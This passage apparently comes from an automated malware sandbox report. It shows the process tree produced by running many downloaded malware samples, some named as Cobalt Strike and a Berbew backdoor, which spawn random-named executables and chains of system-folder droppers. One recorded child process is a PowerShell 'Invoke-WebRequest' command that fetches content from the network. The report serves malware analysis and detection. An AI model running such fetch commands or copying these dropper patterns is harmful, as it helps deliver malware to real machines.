  - - C:\Windows\System\zqjQCzT.exe
      C:\Windows\System\zqjQCzT.exe
      4⤵
      PID:17372
  - - C:\Windows\System\unTJEsZ.exe
      C:\Windows\System\unTJEsZ.exe
      4⤵
      PID:12220
  - - C:\Windows\System\VBjlnxD.exe
      C:\Windows\System\VBjlnxD.exe
      4⤵
      PID:2100
  - - C:\Windows\System\vLtFBvK.exe
      C:\Windows\System\vLtFBvK.exe
      4⤵
      PID:8100
  - - C:\Windows\System\lOdUYCs.exe
      C:\Windows\System\lOdUYCs.exe
      4⤵
      PID:10876
  - - C:\Windows\System\vPyIquc.exe
      C:\Windows\System\vPyIquc.exe
      4⤵
      PID:8452
  - - C:\Windows\System\FtCEojd.exe
      C:\Windows\System\FtCEojd.exe
      4⤵
      PID:17436
  - - C:\Windows\System\iUUdLlr.exe
      C:\Windows\System\iUUdLlr.exe
      4⤵
      PID:17472
  - - C:\Windows\System\OjTAAEO.exe
      C:\Windows\System\OjTAAEO.exe
      4⤵
      PID:17516
  - - C:\Windows\System\lozDaLd.exe
      C:\Windows\System\lozDaLd.exe
      4⤵
      PID:17560
  - - C:\Windows\System\rvCLmFC.exe
      C:\Windows\System\rvCLmFC.exe
      4⤵
      PID:17596
  - - C:\Windows\System\aHxtNgr.exe
      C:\Windows\System\aHxtNgr.exe
      4⤵
      PID:12648
  - - C:\Windows\System\YNfZgLY.exe
      C:\Windows\System\YNfZgLY.exe
      4⤵
      PID:12556
  - - C:\Windows\System\smLCvQq.exe
      C:\Windows\System\smLCvQq.exe
      4⤵
      PID:12684
  - - C:\Windows\System\RCcglXd.exe
      C:\Windows\System\RCcglXd.exe
      4⤵
      PID:12712
  - - C:\Windows\System\enelHVt.exe
      C:\Windows\System\enelHVt.exe
      4⤵
      PID:17680
  - - C:\Windows\System\wamOnVR.exe
      C:\Windows\System\wamOnVR.exe
      4⤵
      PID:5452
  - - C:\Windows\System\nzzyWdD.exe
      C:\Windows\System\nzzyWdD.exe
      4⤵
      PID:17744
  - - C:\Windows\System\UUtIguT.exe
      C:\Windows\System\UUtIguT.exe
      4⤵
      PID:17772
  - - C:\Windows\System\jGtFBUJ.exe
      C:\Windows\System\jGtFBUJ.exe
      4⤵
      PID:17824
  - - C:\Windows\System\tSlMdHK.exe
      C:\Windows\System\tSlMdHK.exe
      4⤵
      PID:17856
  - - C:\Windows\System\CmlGAuv.exe
      C:\Windows\System\CmlGAuv.exe
      4⤵
      PID:14584
  - - C:\Windows\System\acXgnyJ.exe
      C:\Windows\System\acXgnyJ.exe
      4⤵
      PID:17920
  - - C:\Windows\System\UYFETXf.exe
      C:\Windows\System\UYFETXf.exe
      4⤵
      PID:5276
- - C:\Users\Admin\Downloads\240919-hmc6pswdnn1c8a1a2f42fd70f262b091743ad8853b9ab7884f21c9c8a5b0145c5e74880ed5N.exe
    C:\Users\Admin\Downloads\240919-hmc6pswdnn1c8a1a2f42fd70f262b091743ad8853b9ab7884f21c9c8a5b0145c5e74880ed5N.exe
    3⤵
    PID:9576
  - - C:\Windows\SysWOW64\Opogbbig.exe
      C:\Windows\system32\Opogbbig.exe
      4⤵
      PID:2284
    - - C:\Windows\SysWOW64\Acnemi32.exe
        
        C:\Windows\system32\Acnemi32.exe
        5⤵
        
        PID:11032
      - C:\Windows\SysWOW64\Djdflp32.exe
        
        C:\Windows\system32\Djdflp32.exe
        6⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\Gaefgd32.exe
        
        C:\Windows\system32\Gaefgd32.exe
        7⤵
        
        PID:14236
        
        C:\Windows\SysWOW64\Ahcajk32.exe
        
        C:\Windows\system32\Ahcajk32.exe
        8⤵
        
        PID:12960
- - C:\Users\Admin\Downloads\240919-hypzmswfpb1f179fcaa203b892ce3a7d3b352adc2007050b9bc405b783730fc25f533f351aN.exe
    C:\Users\Admin\Downloads\240919-hypzmswfpb1f179fcaa203b892ce3a7d3b352adc2007050b9bc405b783730fc25f533f351aN.exe
    3⤵
    PID:9588
  - - C:\Windows\SysWOW64\Ooagno32.exe
      C:\Windows\system32\Ooagno32.exe
      4⤵
      PID:6188
    - - C:\Windows\SysWOW64\Agiamhdo.exe
        
        C:\Windows\system32\Agiamhdo.exe
        5⤵
        
        PID:11072
      - C:\Windows\SysWOW64\Dpckjfgg.exe
        
        C:\Windows\system32\Dpckjfgg.exe
        6⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\Hhfedm32.exe
        
        C:\Windows\system32\Hhfedm32.exe
        7⤵
        
        PID:3964
        
        C:\Windows\SysWOW64\Dbjkkl32.exe
        
        C:\Windows\system32\Dbjkkl32.exe
        8⤵
        
        PID:2516
- - C:\Users\Admin\Downloads\240919-hqdawaweqlpe513ZxNNQ32P70.exe
    C:\Users\Admin\Downloads\240919-hqdawaweqlpe513ZxNNQ32P70.exe
    3⤵
    PID:9600
- - C:\Users\Admin\Downloads\240919-hlps4swdlna801a623080eaac37eb5fc872a3ba272f9c02c893e5938f434873872624987e7N.exe
    C:\Users\Admin\Downloads\240919-hlps4swdlna801a623080eaac37eb5fc872a3ba272f9c02c893e5938f434873872624987e7N.exe
    3⤵
    PID:9612
  - - C:\Windows\SysWOW64\Qljjjqlc.exe
      C:\Windows\system32\Qljjjqlc.exe
      4⤵
      PID:10540
    - - C:\Windows\SysWOW64\Bqmeal32.exe
        
        C:\Windows\system32\Bqmeal32.exe
        5⤵
        
        PID:11628
- - C:\Users\Admin\Downloads\240919-hva2bawelbce6d93acf1eca849bc1f50239c696aacab7c30b40e6256225ccf1a10ef4479d2N.exe
    C:\Users\Admin\Downloads\240919-hva2bawelbce6d93acf1eca849bc1f50239c696aacab7c30b40e6256225ccf1a10ef4479d2N.exe
    3⤵
    PID:9620
- - C:\Users\Admin\Downloads\240919-h5yv5axcmqead656c70fb282982156e578a0ff799e_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h5yv5axcmqead656c70fb282982156e578a0ff799e_JaffaCakes118.exe
    3⤵
    PID:9632
- - C:\Users\Admin\Downloads\240919-h9lflaxbpf2e2d30eac5a3420a153aa14a6727a689ad0ece2a53ec52494f6d0a2904b1d50eN.exe
    C:\Users\Admin\Downloads\240919-h9lflaxbpf2e2d30eac5a3420a153aa14a6727a689ad0ece2a53ec52494f6d0a2904b1d50eN.exe
    3⤵
    PID:9644
- - C:\Users\Admin\Downloads\240919-hwbdgawgrkb1e239a4a71a99932983272cf351112413e6d632962dd913275e3d315aacd254N.exe
    C:\Users\Admin\Downloads\240919-hwbdgawgrkb1e239a4a71a99932983272cf351112413e6d632962dd913275e3d315aacd254N.exe
    3⤵
    PID:9652
  - - C:\Windows\SysWOW64\Oekpkigo.exe
      C:\Windows\system32\Oekpkigo.exe
      4⤵
      PID:6252
    - - C:\Windows\SysWOW64\Aflaie32.exe
        
        C:\Windows\system32\Aflaie32.exe
        5⤵
        
        PID:11112
      - C:\Windows\SysWOW64\Dhjckcgi.exe
        
        C:\Windows\system32\Dhjckcgi.exe
        6⤵
        
        PID:9944
        
        C:\Windows\SysWOW64\Hdmein32.exe
        
        C:\Windows\system32\Hdmein32.exe
        7⤵
        
        PID:9140
        
        C:\Windows\SysWOW64\Dfefkkqp.exe
        
        C:\Windows\system32\Dfefkkqp.exe
        8⤵
        
        PID:6524
- - C:\Users\Admin\Downloads\240919-hvzdxawemhicsys.icn.exe
    C:\Users\Admin\Downloads\240919-hvzdxawemhicsys.icn.exe
    3⤵
    PID:9668
- - C:\Users\Admin\Downloads\240919-hrmkyawdldeace0c23b97c6b69fdb3c708967d8f78_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hrmkyawdldeace0c23b97c6b69fdb3c708967d8f78_JaffaCakes118.exe
    3⤵
    PID:9688
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9688 -s 524
      4⤵
      Program crash
      PID:8980
- - C:\Users\Admin\Downloads\240919-hz6zjswgkgf68c8298d6aa8c70780a0f68283116b162747f5ec6f35fe0138b66a3b8a434eaN.exe
    C:\Users\Admin\Downloads\240919-hz6zjswgkgf68c8298d6aa8c70780a0f68283116b162747f5ec6f35fe0138b66a3b8a434eaN.exe
    3⤵
    PID:9704
- - C:\Users\Admin\Downloads\240919-hzmkxawgja4d6efe6b8c3b67e6f7758a47f8157779a8b4bffc861ccfe2a54ef4074fad78efN.exe
    C:\Users\Admin\Downloads\240919-hzmkxawgja4d6efe6b8c3b67e6f7758a47f8157779a8b4bffc861ccfe2a54ef4074fad78efN.exe
    3⤵
    PID:9716
- - C:\Users\Admin\Downloads\240919-hy83hswfrdead25cab95581b873ca5ff12ef45dffa_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hy83hswfrdead25cab95581b873ca5ff12ef45dffa_JaffaCakes118.exe
    3⤵
    PID:9728
- - C:\Users\Admin\Downloads\240919-hrjt2swdlcbbbb7815be1bc23f4d86267c11556ff44d0a23d02ec727af44694549ad97a4ddN.exe
    C:\Users\Admin\Downloads\240919-hrjt2swdlcbbbb7815be1bc23f4d86267c11556ff44d0a23d02ec727af44694549ad97a4ddN.exe
    3⤵
    PID:9736
- - C:\Users\Admin\Downloads\240919-hv4cvswgqkc3d16ff6123a09ab1c87b3127ad46a26f3a483edb5d5e45d85371bef396faca7N.exe
    C:\Users\Admin\Downloads\240919-hv4cvswgqkc3d16ff6123a09ab1c87b3127ad46a26f3a483edb5d5e45d85371bef396faca7N.exe
    3⤵
    PID:9752
  - - C:\Windows\SysWOW64\Oiihahme.exe
      C:\Windows\system32\Oiihahme.exe
      4⤵
      PID:7584
    - - C:\Windows\SysWOW64\Aodfajaj.exe
        
        C:\Windows\system32\Aodfajaj.exe
        5⤵
        
        PID:5656
      - C:\Windows\SysWOW64\Eipinkib.exe
        
        C:\Windows\system32\Eipinkib.exe
        6⤵
        
        PID:8456
        
        C:\Windows\SysWOW64\Hpfcdojl.exe
        
        C:\Windows\system32\Hpfcdojl.exe
        7⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\Akamff32.exe
        
        C:\Windows\system32\Akamff32.exe
        8⤵
        
        PID:13304
- - C:\Users\Admin\Downloads\240919-hv7ehswenfa0695d188c1aa4bf82891b792b66c56dae18478bba0374adafb96794c1a0a169N.exe
    C:\Users\Admin\Downloads\240919-hv7ehswenfa0695d188c1aa4bf82891b792b66c56dae18478bba0374adafb96794c1a0a169N.exe
    3⤵
    PID:9764
  - - C:\Windows\SysWOW64\Ohlimd32.exe
      C:\Windows\system32\Ohlimd32.exe
      4⤵
      PID:8216
    - - C:\Windows\SysWOW64\Ajhniccb.exe
        
        C:\Windows\system32\Ajhniccb.exe
        5⤵
        
        PID:11152
      - C:\Windows\SysWOW64\Dmglcj32.exe
        
        C:\Windows\system32\Dmglcj32.exe
        6⤵
        
        PID:9132
        
        C:\Windows\SysWOW64\Hkgnfhnh.exe
        
        C:\Windows\system32\Hkgnfhnh.exe
        7⤵
        
        PID:7956
        
        C:\Windows\SysWOW64\Jjgchm32.exe
        
        C:\Windows\system32\Jjgchm32.exe
        8⤵
        
        PID:17808
- - C:\Users\Admin\Downloads\240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
    3⤵
    PID:9776
- - C:\Users\Admin\Downloads\240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe
    C:\Users\Admin\Downloads\240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe
    3⤵
    PID:9788
- - C:\Users\Admin\Downloads\240919-h1n55axamr3f72eb6eb6e561cf3de3413c84881d5a6420fc4874ecee7e1e8076ff7bbc5c83N.exe
    C:\Users\Admin\Downloads\240919-h1n55axamr3f72eb6eb6e561cf3de3413c84881d5a6420fc4874ecee7e1e8076ff7bbc5c83N.exe
    3⤵
    PID:9800
  - - C:\Windows\SysWOW64\Opcqnb32.exe
      C:\Windows\system32\Opcqnb32.exe
      4⤵
      PID:5916
    - - C:\Windows\SysWOW64\Aijnep32.exe
        
        C:\Windows\system32\Aijnep32.exe
        5⤵
        
        PID:11192
      - C:\Windows\SysWOW64\Ehfcfb32.exe
        
        C:\Windows\system32\Ehfcfb32.exe
        6⤵
        
        PID:12716
        
        C:\Windows\SysWOW64\Igchfiof.exe
        
        C:\Windows\system32\Igchfiof.exe
        7⤵
        
        PID:14360
        
        C:\Windows\SysWOW64\Jdmgfedl.exe
        
        C:\Windows\system32\Jdmgfedl.exe
        8⤵
        
        PID:17924
- - C:\Users\Admin\Downloads\240919-h1v9faxannca2701d72c1a5fa210648dc72c1cc9f43d468957401f7dcf5b3cd17b81c31c76.exe
    C:\Users\Admin\Downloads\240919-h1v9faxannca2701d72c1a5fa210648dc72c1cc9f43d468957401f7dcf5b3cd17b81c31c76.exe
    3⤵
    PID:9824
- - C:\Users\Admin\Downloads\240919-hr3bdswdmeeace767a7084110c7be0bda411cbd996_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hr3bdswdmeeace767a7084110c7be0bda411cbd996_JaffaCakes118.exe
    3⤵
    PID:9836
- - C:\Users\Admin\Downloads\240919-htp4vawgjna25713b54d44c600fa207070f662465684fb10108b7ef523c9ad774e38f3fea9N.exe
    C:\Users\Admin\Downloads\240919-htp4vawgjna25713b54d44c600fa207070f662465684fb10108b7ef523c9ad774e38f3fea9N.exe
    3⤵
    PID:9848
  - - C:\Users\Admin\AppData\Local\Temp\services.exe
      "C:\Users\Admin\AppData\Local\Temp\services.exe"
      4⤵
      PID:2164
- - C:\Users\Admin\Downloads\240919-h8391sxbmgd9546c9854d427b0791a399c1198d1f482aaf6e12f0c40f500478096cce24e99N.exe
    C:\Users\Admin\Downloads\240919-h8391sxbmgd9546c9854d427b0791a399c1198d1f482aaf6e12f0c40f500478096cce24e99N.exe
    3⤵
    PID:9860
  - - C:\Windows\SysWOW64\Oepifi32.exe
      C:\Windows\system32\Oepifi32.exe
      4⤵
      PID:7468
    - - C:\Windows\SysWOW64\Aqaffn32.exe
        
        C:\Windows\system32\Aqaffn32.exe
        5⤵
        
        PID:11232
      - C:\Windows\SysWOW64\Dmihij32.exe
        
        C:\Windows\system32\Dmihij32.exe
        6⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\Hhknpmma.exe
        
        C:\Windows\system32\Hhknpmma.exe
        7⤵
        
        PID:6408
        
        C:\Windows\SysWOW64\Ikdcmpnl.exe
        
        C:\Windows\system32\Ikdcmpnl.exe
        8⤵
        
        PID:17756
- - C:\Users\Admin\Downloads\240919-hpbewswelpeacc58a6b2cf9932ce06aa635d66c107_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hpbewswelpeacc58a6b2cf9932ce06aa635d66c107_JaffaCakes118.exe
    3⤵
    PID:9872
- - C:\Users\Admin\Downloads\240919-h1nvcsxamqead32fb8ca704940236ce1797df91134_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h1nvcsxamqead32fb8ca704940236ce1797df91134_JaffaCakes118.exe
    3⤵
    PID:9884
- - C:\Users\Admin\Downloads\240919-h3gh3axbml515c47c2b1ab612bc207138c5455bf4bc55e977ba2235af4451017f0cfd12982.exe
    C:\Users\Admin\Downloads\240919-h3gh3axbml515c47c2b1ab612bc207138c5455bf4bc55e977ba2235af4451017f0cfd12982.exe
    3⤵
    PID:9896
- - C:\Users\Admin\Downloads\240919-h4h4aawhne467e73a9292493518d4f90ba0a875c2b45b200740438e0401bfc595a6cde6a5eN.exe
    C:\Users\Admin\Downloads\240919-h4h4aawhne467e73a9292493518d4f90ba0a875c2b45b200740438e0401bfc595a6cde6a5eN.exe
    3⤵
    PID:9916
  - - C:\Windows\SysWOW64\Oohnonij.exe
      C:\Windows\system32\Oohnonij.exe
      4⤵
      PID:6300
    - - C:\Windows\SysWOW64\Aglnbhal.exe
        
        C:\Windows\system32\Aglnbhal.exe
        5⤵
        
        PID:7072
      - C:\Windows\SysWOW64\Igqkqiai.exe
        
        C:\Windows\system32\Igqkqiai.exe
        6⤵
        
        PID:8204
        
        C:\Windows\SysWOW64\Okgaijaj.exe
        
        C:\Windows\system32\Okgaijaj.exe
        7⤵
        
        PID:7620
- - C:\Users\Admin\Downloads\240919-hw34gswfjb24789e6d90fed4b5d3f5e4461a41d76dde958c6a0b28a20952d58a691838566bN.exe
    C:\Users\Admin\Downloads\240919-hw34gswfjb24789e6d90fed4b5d3f5e4461a41d76dde958c6a0b28a20952d58a691838566bN.exe
    3⤵
    PID:9928
  - - C:\Windows\SysWOW64\Ocdjpmac.exe
      C:\Windows\system32\Ocdjpmac.exe
      4⤵
      PID:6452
    - - C:\Windows\SysWOW64\Afnnnd32.exe
        
        C:\Windows\system32\Afnnnd32.exe
        5⤵
        
        PID:7604
      - C:\Windows\SysWOW64\Eplnpeol.exe
        
        C:\Windows\system32\Eplnpeol.exe
        6⤵
        
        PID:12448
        
        C:\Windows\SysWOW64\Iafonaao.exe
        
        C:\Windows\system32\Iafonaao.exe
        7⤵
        
        PID:12340
        
        C:\Windows\SysWOW64\Qebhhp32.exe
        
        C:\Windows\system32\Qebhhp32.exe
        8⤵
        
        PID:12468
- - C:\Users\Admin\Downloads\240919-h6wr6axamdead703de2f19ed378f7a531606225a7a_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h6wr6axamdead703de2f19ed378f7a531606225a7a_JaffaCakes118.exe
    3⤵
    PID:9952
- - C:\Users\Admin\Downloads\240919-hzha7awfrgead2793e4c0f27b9cf4bf13be871b335_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hzha7awfrgead2793e4c0f27b9cf4bf13be871b335_JaffaCakes118.exe
    3⤵
    PID:9968
- - C:\Users\Admin\Downloads\240919-hrs3qawfmleace25b4f1d6c85e7f25da4cd65b3af7_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hrs3qawfmleace25b4f1d6c85e7f25da4cd65b3af7_JaffaCakes118.exe
    3⤵
    PID:9984
- - C:\Users\Admin\Downloads\240919-hsnjmawfpqa142af42dce4dd20008229039f08037ba558c721cd637f2e3d6e2122aab29b08N.exe
    C:\Users\Admin\Downloads\240919-hsnjmawfpqa142af42dce4dd20008229039f08037ba558c721cd637f2e3d6e2122aab29b08N.exe
    3⤵
    PID:9992
  - - C:\Users\Admin\Downloads\240919-hsnjmawfpqa142af42dce4dd20008229039f08037ba558c721cd637f2e3d6e2122aab29b08NSrv.exe
      C:\Users\Admin\Downloads\240919-hsnjmawfpqa142af42dce4dd20008229039f08037ba558c721cd637f2e3d6e2122aab29b08NSrv.exe
      4⤵
      PID:7984
- - C:\Users\Admin\Downloads\240919-h4k8mswhng1b8ba49ade5f43b33f3629953b52dde9ab2942570bbd51cf1e2b2eec8965bd13N.exe
    C:\Users\Admin\Downloads\240919-h4k8mswhng1b8ba49ade5f43b33f3629953b52dde9ab2942570bbd51cf1e2b2eec8965bd13N.exe
    3⤵
    PID:10008
  - - C:\Windows\SysWOW64\Ohqbhdpj.exe
      C:\Windows\system32\Ohqbhdpj.exe
      4⤵
      PID:7260
    - - C:\Windows\SysWOW64\Bgpgng32.exe
        
        C:\Windows\system32\Bgpgng32.exe
        5⤵
        
        PID:11280
- - C:\Users\Admin\Downloads\240919-hj38qawamg2024-09-19_1a5493b328c886fcb700dc374fe0552b_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hj38qawamg2024-09-19_1a5493b328c886fcb700dc374fe0552b_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:10016
- - C:\Users\Admin\Downloads\240919-h6cpaaxakfead6a70ac36bcb7aeb824bab02afd5b5_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h6cpaaxakfead6a70ac36bcb7aeb824bab02afd5b5_JaffaCakes118.exe
    3⤵
    PID:10028
- - C:\Users\Admin\Downloads\240919-hn1cmawelk42977c5c3fb1eeab6b73b1b3ca2c8a50acb151a88a74de26de6c71cd180abe3fN.exe
    C:\Users\Admin\Downloads\240919-hn1cmawelk42977c5c3fb1eeab6b73b1b3ca2c8a50acb151a88a74de26de6c71cd180abe3fN.exe
    3⤵
    PID:10036
- - C:\Users\Admin\Downloads\240919-h1j66sxamnBackdoor.Win32.Berbew.AA.MTB-4f1d77e73b49efd0c347ba4e818e49a105e4c033f1f3b0094cee719dbf88fa0bN
    C:\Users\Admin\Downloads\240919-h1j66sxamnBackdoor.Win32.Berbew.AA.MTB-4f1d77e73b49efd0c347ba4e818e49a105e4c033f1f3b0094cee719dbf88fa0bN
    3⤵
    PID:10056
  - - C:\Windows\SysWOW64\Ollnhb32.exe
      C:\Windows\system32\Ollnhb32.exe
      4⤵
      PID:5616
    - - C:\Windows\SysWOW64\Bgnkhg32.exe
        
        C:\Windows\system32\Bgnkhg32.exe
        5⤵
        
        PID:7448
      - C:\Windows\SysWOW64\Iqklon32.exe
        
        C:\Windows\system32\Iqklon32.exe
        6⤵
        
        PID:14460
        
        C:\Windows\SysWOW64\Akcjkfij.exe
        
        C:\Windows\system32\Akcjkfij.exe
        7⤵
        
        PID:13396
- - C:\Users\Admin\Downloads\240919-h6nrjsxalfed64ae082d0168c868559c65c2c8470a6eaf662bb70d4641be334517f06d50c4N.exe
    C:\Users\Admin\Downloads\240919-h6nrjsxalfed64ae082d0168c868559c65c2c8470a6eaf662bb70d4641be334517f06d50c4N.exe
    3⤵
    PID:10068
  - - C:\Windows\SysWOW64\Ophjiaql.exe
      C:\Windows\system32\Ophjiaql.exe
      4⤵
      PID:7564
    - - C:\Windows\SysWOW64\Bjlgdc32.exe
        
        C:\Windows\system32\Bjlgdc32.exe
        5⤵
        
        PID:7356
      - C:\Windows\SysWOW64\Eiildjag.exe
        
        C:\Windows\system32\Eiildjag.exe
        6⤵
        
        PID:12928
        
        C:\Windows\SysWOW64\Lgffic32.exe
        
        C:\Windows\system32\Lgffic32.exe
        7⤵
        
        PID:15248
        
        C:\Windows\SysWOW64\Bbgeno32.exe
        
        C:\Windows\system32\Bbgeno32.exe
        8⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\Kkeldnpi.exe
        
        C:\Windows\system32\Kkeldnpi.exe
        9⤵
        
        PID:18452
- - C:\Users\Admin\Downloads\240919-hrev4awdkg0b4660b7898e77dd20bdf2071e0d107aa928ab89fb323dab2f5ba92c1d089553N.exe
    C:\Users\Admin\Downloads\240919-hrev4awdkg0b4660b7898e77dd20bdf2071e0d107aa928ab89fb323dab2f5ba92c1d089553N.exe
    3⤵
    PID:10080
  - - C:\Windows\SysWOW64\Ookjdn32.exe
      C:\Windows\system32\Ookjdn32.exe
      4⤵
      PID:7472
    - - C:\Windows\SysWOW64\Bcbohigp.exe
        
        C:\Windows\system32\Bcbohigp.exe
        5⤵
        
        PID:7400
      - C:\Windows\SysWOW64\Epagkd32.exe
        
        C:\Windows\system32\Epagkd32.exe
        6⤵
        
        PID:12824
        
        C:\Windows\SysWOW64\Ajpqnneo.exe
        
        C:\Windows\system32\Ajpqnneo.exe
        7⤵
        
        PID:13116
        
        C:\Windows\SysWOW64\Jknfcofa.exe
        
        C:\Windows\system32\Jknfcofa.exe
        8⤵
        
        PID:3092
- - C:\Users\Admin\Downloads\240919-hvhfdswgmr472cccb8f0f7b21e2ab41dac77af16d690f9605b8abad0ff6de487ccc230e3a5N.exe
    C:\Users\Admin\Downloads\240919-hvhfdswgmr472cccb8f0f7b21e2ab41dac77af16d690f9605b8abad0ff6de487ccc230e3a5N.exe
    3⤵
    PID:10096
  - - C:\Windows\SysWOW64\Ocffempp.exe
      C:\Windows\system32\Ocffempp.exe
      4⤵
      PID:6576
    - - C:\Windows\SysWOW64\Bqdblmhl.exe
        
        C:\Windows\system32\Bqdblmhl.exe
        5⤵
        
        PID:5368
- - C:\Users\Admin\Downloads\240919-htyqzswgljec63af30d0ee34b1cbe9c92ca208d0d185ca6d9f3690d0fc20bd3747c0db48f9N.exe
    C:\Users\Admin\Downloads\240919-htyqzswgljec63af30d0ee34b1cbe9c92ca208d0d185ca6d9f3690d0fc20bd3747c0db48f9N.exe
    3⤵
    PID:10108
- - C:\Users\Admin\Downloads\240919-h745xsxarh53b3e76b9c14ce0692825bb4a21b97ddd367b06da9455127284796fab2b0d7e3N.exe
    C:\Users\Admin\Downloads\240919-h745xsxarh53b3e76b9c14ce0692825bb4a21b97ddd367b06da9455127284796fab2b0d7e3N.exe
    3⤵
    PID:10120
  - - C:\Windows\SysWOW64\Pedbahod.exe
      C:\Windows\system32\Pedbahod.exe
      4⤵
      PID:5152
    - - C:\Windows\SysWOW64\Bqilgmdg.exe
        
        C:\Windows\system32\Bqilgmdg.exe
        5⤵
        
        PID:11400
      - C:\Windows\SysWOW64\Fkkeclfh.exe
        
        C:\Windows\system32\Fkkeclfh.exe
        6⤵
        
        PID:7236
        
        C:\Windows\SysWOW64\Ljdceo32.exe
        
        C:\Windows\system32\Ljdceo32.exe
        7⤵
        
        PID:15336
        
        C:\Windows\SysWOW64\Bbgeno32.exe
        
        C:\Windows\system32\Bbgeno32.exe
        8⤵
        
        PID:11040
        
        C:\Windows\SysWOW64\Kdkdgchl.exe
        
        C:\Windows\system32\Kdkdgchl.exe
        9⤵
        
        PID:12956
- - C:\Users\Admin\Downloads\240919-hlbw9awarb9508c09d7dfb89931ad49cacba2daf4b3f306303c2815af7f07bc63ffaffb002N.exe
    C:\Users\Admin\Downloads\240919-hlbw9awarb9508c09d7dfb89931ad49cacba2daf4b3f306303c2815af7f07bc63ffaffb002N.exe
    3⤵
    PID:10128
- - C:\Users\Admin\Downloads\240919-h6tmssxcqqe6f091d559d8cf83e8dfa98a5afee9c24a4b4fc0dafc80596d6075799bb3ed11N.exe
    C:\Users\Admin\Downloads\240919-h6tmssxcqqe6f091d559d8cf83e8dfa98a5afee9c24a4b4fc0dafc80596d6075799bb3ed11N.exe
    3⤵
    PID:10144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:14920
  - - C:\Windows\System\LfGeRiD.exe
      C:\Windows\System\LfGeRiD.exe
      4⤵
      PID:11180
  - - C:\Windows\System\jxgMxKN.exe
      C:\Windows\System\jxgMxKN.exe
      4⤵
      PID:4788
  - - C:\Windows\System\BPNGbth.exe
      C:\Windows\System\BPNGbth.exe
      4⤵
      PID:10740
  - - C:\Windows\System\VnUdQwt.exe
      C:\Windows\System\VnUdQwt.exe
      4⤵
      PID:8876
  - - C:\Windows\System\YxUPOge.exe
      C:\Windows\System\YxUPOge.exe
      4⤵
      PID:9252
  - - C:\Windows\System\aDzpJCB.exe
      C:\Windows\System\aDzpJCB.exe
      4⤵
      PID:13948
  - - C:\Windows\System\NfzCUlz.exe
      C:\Windows\System\NfzCUlz.exe
      4⤵
      PID:10932
  - - C:\Windows\System\QpDculk.exe
      C:\Windows\System\QpDculk.exe
      4⤵
      PID:14468
  - - C:\Windows\System\OBtxLHd.exe
      C:\Windows\System\OBtxLHd.exe
      4⤵
      PID:4844
  - - C:\Windows\System\IMUPPXx.exe
      C:\Windows\System\IMUPPXx.exe
      4⤵
      PID:11680
  - - C:\Windows\System\AOwMCxJ.exe
      C:\Windows\System\AOwMCxJ.exe
      4⤵
      PID:10600
  - - C:\Windows\System\CsRfTJv.exe
      C:\Windows\System\CsRfTJv.exe
      4⤵
      PID:10448
  - - C:\Windows\System\WCdAngt.exe
      C:\Windows\System\WCdAngt.exe
      4⤵
      PID:11764
  - - C:\Windows\System\tRITopQ.exe
      C:\Windows\System\tRITopQ.exe
      4⤵
      PID:6488
  - - C:\Windows\System\DRfGRHB.exe
      C:\Windows\System\DRfGRHB.exe
      4⤵
      PID:6728
  - - C:\Windows\System\ioirqYT.exe
      C:\Windows\System\ioirqYT.exe
      4⤵
      PID:12832
  - - C:\Windows\System\CqkStHv.exe
      C:\Windows\System\CqkStHv.exe
      4⤵
      PID:13992
  - - C:\Windows\System\LNqOTEY.exe
      C:\Windows\System\LNqOTEY.exe
      4⤵
      PID:6140
  - - C:\Windows\System\fnIyQYM.exe
      C:\Windows\System\fnIyQYM.exe
      4⤵
      PID:10000
  - - C:\Windows\System\ElLjSGd.exe
      C:\Windows\System\ElLjSGd.exe
      4⤵
      PID:11000
  - - C:\Windows\System\qQDJnAf.exe
      C:\Windows\System\qQDJnAf.exe
      4⤵
      PID:3424
  - - C:\Windows\System\KbHtLbE.exe
      C:\Windows\System\KbHtLbE.exe
      4⤵
      PID:13968
  - - C:\Windows\System\fUpkcGe.exe
      C:\Windows\System\fUpkcGe.exe
      4⤵
      PID:5436
  - - C:\Windows\System\hthbMbv.exe
      C:\Windows\System\hthbMbv.exe
      4⤵
      PID:11256
  - - C:\Windows\System\rvzbTPx.exe
      C:\Windows\System\rvzbTPx.exe
      4⤵
      PID:6396
  - - C:\Windows\System\FWxzsGB.exe
      C:\Windows\System\FWxzsGB.exe
      4⤵
      PID:7116
  - - C:\Windows\System\HTCczHd.exe
      C:\Windows\System\HTCczHd.exe
      4⤵
      PID:8376
  - - C:\Windows\System\zYypzsq.exe
      C:\Windows\System\zYypzsq.exe
      4⤵
      PID:8184
  - - C:\Windows\System\FORmbUd.exe
      C:\Windows\System\FORmbUd.exe
      4⤵
      PID:15380
  - - C:\Windows\System\EPnnjMR.exe
      C:\Windows\System\EPnnjMR.exe
      4⤵
      PID:15396
  - - C:\Windows\System\cEhcruM.exe
      C:\Windows\System\cEhcruM.exe
      4⤵
      PID:15412
  - - C:\Windows\System\msDdEeX.exe
      C:\Windows\System\msDdEeX.exe
      4⤵
